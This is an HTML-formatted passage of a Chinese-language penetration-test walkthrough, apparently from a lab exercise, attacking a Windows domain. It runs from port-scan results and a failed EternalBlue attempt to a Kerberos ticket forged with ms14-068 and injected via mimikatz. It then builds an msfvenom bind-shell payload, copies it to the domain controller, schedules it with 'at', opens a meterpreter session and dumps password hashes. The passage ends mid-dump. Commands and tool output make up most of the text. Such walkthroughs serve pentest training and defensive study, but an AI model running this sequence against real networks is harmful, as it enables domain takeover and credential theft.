                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">unknown</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="112" colspan="2" valign="top" style="width:84.0pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">49154/tcp   open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">unknown</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="112" colspan="2" valign="top" style="width:84.0pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">49156/tcp   open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">unknown</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="112" colspan="2" valign="top" style="width:84.0pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">49157/tcp   open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">unknown</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:15.6pt;">
                        <td width="112" colspan="2" valign="top" style="width:84.0pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">49158/tcp   open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">unknown</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
                <tr style="height:12.9pt;">
                        <td width="112" colspan="2" valign="top" style="width:84.0pt;padding:0cm 0cm 0cm 0cm;height:12.9pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">49163/tcp   open</span><span lang="EN-US"></span>
                                </p>
                        </td>
                        <td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:12.9pt;">
                                <p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
                                        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">unknown</span><span lang="EN-US"></span>
                                </p>
                        </td>
                </tr>
        </tbody>
</table>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:30.55pt;margin-left:-.25pt;">
        <a name="_Toc21070"></a><span lang="EN-US">5.1.10. </span><span><span style="font-family:宋体;font-weight:normal;">永恒之蓝 </span><span lang="EN-US">ms17_010 </span></span><span><span style="font-family:宋体;font-weight:normal;">进行溢出</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:5.95pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="240" src="https://www.2k8.org/content/uploadfile/202203/17/80149123.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:40.95pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">溢出失败</span><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:11.4pt;margin-left:-.75pt;text-indent:0cm;tab-stops:center 126.1pt;">
        <a name="_Toc21071"></a><span lang="EN-US">5.1.11.<span>&nbsp;&nbsp; </span>ms14-068 </span><span><span style="font-family:宋体;font-weight:normal;">的条件</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:39.95pt;margin-left:-.25pt;margin-right:226.4pt;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">使用这个 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">exp </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">需要一个普通域控用户 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">web </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">是域用户 但是不知道密码</span><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
        <a name="_Toc21072"></a><span lang="EN-US">5.1.12. </span><span><span style="font-family:宋体;font-weight:normal;">开启远程桌面</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:196.4pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">run post/windows/manage/enable_rdp rdesktop 192.168.0.150</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:25.55pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="363" src="https://www.2k8.org/content/uploadfile/202203/17/941f0f58.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:8.35pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="422" src="https://www.2k8.org/content/uploadfile/202203/17/a7d27de9.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">密码应该是对的 但不是远程组而已</span><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:22.35pt;margin-left:-.75pt;text-indent:0cm;tab-stops:center 134.15pt;">
        <a name="_Toc21073"></a><span lang="EN-US">5.1.13.<span>&nbsp;&nbsp; </span>ms14-068 </span><span><span style="font-family:宋体;font-weight:normal;">提权域控</span></span><span lang="EN-US"></span>
</h3>
<h6 style="margin-left:-.25pt;">
        <span lang="EN-US">5.1.13.1. ms14-068.exe </span><span style="font-family:黑体;font-weight:normal;">创建票据</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.15pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">这些信息从 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">metasploit </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">前期信息来的，可以翻到上面查看</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">ms14-068.exe -u [email protected] -s</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:30.4pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="108" src="https://www.2k8.org/content/uploadfile/202203/17/6b219791.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:18.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <b><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">5.1.13.2. </span></b><span style="font-family:黑体;font-size:14.0pt;line-height:110%;">载入 </span><b><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">kiwi</span></b><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:23.5pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">load kiwi</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:18.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <b><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">5.1.13.3. </span></b><span style="font-family:黑体;font-size:14.0pt;line-height:110%;">清理票据</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:24.1pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">kerberos_ticket_purge </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">清理票据</span><span lang="EN-US"></span>
</p>
<h6 style="margin-left:-.25pt;">
        <span lang="EN-US">5.1.13.4. </span><span style="font-family:黑体;font-weight:normal;">导入票据</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">在 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">metasploit mimikatz </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">好似没有这个功能。</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">上传 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">mimikatz </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">注入票据</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">mimikatz # kerberos::ptc </span><u style="text-underline:blue;"><span lang="EN-US" style="color:blue;font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">[email protected]</span></u><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="261" src="https://www.2k8.org/content/uploadfile/202203/17/774ce8bd.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">exit</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">klist </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">查看当前票据</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:4.65pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="225" src="https://www.2k8.org/content/uploadfile/202203/17/5bc1f4ca.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">访问 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">域控</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:57.05pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="219" src="https://www.2k8.org/content/uploadfile/202203/17/c9944886.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:22.2pt;margin-left:-.25pt;">
        <a name="_Toc21074"></a><span lang="EN-US">5.1.14. </span><span><span style="font-family:宋体;font-weight:normal;">获取 </span><span lang="EN-US">dc </span></span><span><span style="font-family:宋体;font-weight:normal;">域控权限</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:18.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <b><span lang="EN-US" style="font-family:Arial,sans-serif;font-size:14.0pt;line-height:110%;">5.1.14.1. </span></b><span style="font-family:黑体;font-size:14.0pt;line-height:110%;">生成正向载荷</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:39.2pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">msfvenom -p windows/meterpreter/bind_tcp lport=13777 -f exe &gt;`pwd`/bind.exe</span><span lang="EN-US"></span>
</p>
<h6 style="margin-left:-.25pt;">
        <span lang="EN-US">5.1.14.2. copy </span><span style="font-family:黑体;font-weight:normal;">复制到域控</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:87.25pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">c:\phpstudy_pro\WWW\www.webhack123.com&gt;copy bind.exe \\dc\C$\ copy bind.exe \\dc\C$\ 1 file(s) copied.</span><span lang="EN-US"></span>
</p>
<h6 style="margin-left:-.25pt;">
        <span lang="EN-US">5.1.14.3. at </span><span style="font-family:黑体;font-weight:normal;">执行任务运行 </span><span lang="EN-US">exe</span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:175.3pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">c:\phpstudy_pro\WWW\www.webhack123.com&gt;at at</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.6pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">There are no entries in the list.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:153.65pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">c:\phpstudy_pro\WWW\www.webhack123.com&gt;at \\dc at \\dc</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.6pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">There are no entries in the list.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:117.85pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">c:\phpstudy_pro\WWW\www.webhack123.com&gt;net time \\dc net time \\dc</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:230%;margin-bottom:15.6pt;margin-left:-.25pt;margin-right:206.35pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:230%;">Current time at \\dc is 2020/6/21 23:53:07 The command completed successfully.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:59.15pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">c:\phpstudy_pro\WWW\www.webhack123.com&gt;at \\dc 23:55:00 c:/bind.exe at \\dc 23:55:00 c:/bind.exe</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:38.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">Added a new job with job ID = 1</span><span lang="EN-US"></span>
</p>
<h6 style="margin-top:0cm;margin-right:0cm;margin-bottom:17.6pt;margin-left:-.25pt;">
        <span lang="EN-US">5.1.14.4. </span><span style="font-family:黑体;font-weight:normal;">获取域控权限命令</span><span lang="EN-US"></span>
</h6>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.0pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">复制文件到目标</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:118%;margin-bottom:1.05pt;margin-left:-.25pt;margin-right:310.9pt;margin-top:0cm;text-align:justify;text-indent:-.5pt;text-justify:inter-ideograph;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:118%;">copy bind.exe \\dc\C$\ </span><span style="font-family:宋体;font-size:10.5pt;line-height:118%;">查询 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:118%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:118%;">时间 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:118%;">net time \\dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:118%;">增加任务执行</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:15.1pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">at \\dc 23:55:00 c:/bind.exe</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.0pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">连接域控</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:79.15pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">use exploit/multi/handler msf5 exploit(multi/handler) &gt; set payload windows/meterpreter/bind_tcp payload =&gt; windows/meterpreter/bind_tcp msf5 exploit(multi/handler) &gt; set rhost 10.10.10.149 rhost =&gt; 10.10.10.149 msf5 exploit(multi/handler) &gt; set lport 13777 lport =&gt; 13777 msf5 exploit(multi/handler) &gt; exploit</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:28.7pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="377" src="https://www.2k8.org/content/uploadfile/202203/17/a66e91e5.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:11.45pt;margin-left:-.25pt;">
        <a name="_Toc21075"></a><span lang="EN-US">5.1.15. </span><span><span style="font-family:宋体;font-weight:normal;">获取 </span><span lang="EN-US">dc </span></span><span><span style="font-family:宋体;font-weight:normal;">域控哈希明文</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.0pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">迁移进程</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:281.6pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">migrate 388 meterpreter &gt; run hashdump</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:60.65pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...] [*] Obtaining the boot key...</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">[*] Calculating the hboot key using SYSKEY 36ce7093f2a02644f802d363ec425289...</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/usr/share/metasploit-framework/lib/rex/script/base.rb:134: warning: constant</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:229.6pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">OpenSSL::Cipher::Cipher is deprecated [*] Obtaining the user list and keys...</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">[*] Decrypting user keys...</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/usr/share/metasploit-framework/lib/rex/script/base.rb:268: warning: constant</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">OpenSSL::Cipher::Cipher is deprecated</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/usr/share/metasploit-framework/lib/rex/script/base.rb:272: warning: constant</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">OpenSSL::Cipher::Cipher is deprecated</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">/usr/share/metasploit-framework/lib/rex/script/base.rb:279: warning: constant</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.25pt;margin-left:-.25pt;margin-right:229.6pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">OpenSSL::Cipher::Cipher is deprecated [*] Dumping password hints...</span><span lang="EN-US"></span>
</p>
